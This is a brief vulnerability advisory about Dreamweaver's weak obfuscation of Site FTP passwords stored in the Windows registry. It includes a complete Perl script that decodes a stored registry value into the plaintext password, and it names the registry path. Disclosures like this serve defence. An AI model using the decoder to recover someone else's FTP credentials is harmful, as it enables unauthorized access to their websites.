|
|
|
|
| |
| A weakness exists the way Dreamweaver stores Site FTP passowords in Windows registry. This allows local attackers to recover them easily. |
| |
Credit:
The information has been provided by Alexandre de Abreu.
|
| |
The Site Configuration feature allows the user to configure the settings for acessing, down/upload files to the server from their local machine. The encryption method designed to obfuscate passwords can be easily defeated.
As a result, anyone who can get access to the registry, can gain access to the user FTP Site (where most of the time a website will be stored)
Exploit:
#!/usr/bin/perl -w
#
# Macromedia Site FTP Pass Hash Cracker
# \HKEY_CURRENT_USER\Software\Macromedia\Dreamweaver\Sites\-Site[]\User PW
#
# Tested on Dreamweaver 4, may work on other versions
# The way the pass is stored is too weak as you can see
#
# Dreamweaver is the most used html/web editor arround, try it:
# http://www.macromedia.com
#
# inode@irc.brasnet.org #unsekure || alexandre@nettion.com.br
use strict;
die "Syntax: $0 [RegString]" unless($ARGV[0]);
our (@a, @aa, $i, $ii);
$ARGV[0] =~ s/(..)/push(@a, $1)/ge;
push (@aa, pack("H2", shift(@a)));
for(@a) {
$i++;
$ii = sprintf("%d", hex("$_")) - $i;
$ii = sprintf("%X", $ii);
push @aa, pack("H2", $ii);
}
print "Pass: "; print for(@aa); print "\n";
exit 0;
|
|
|
|
|
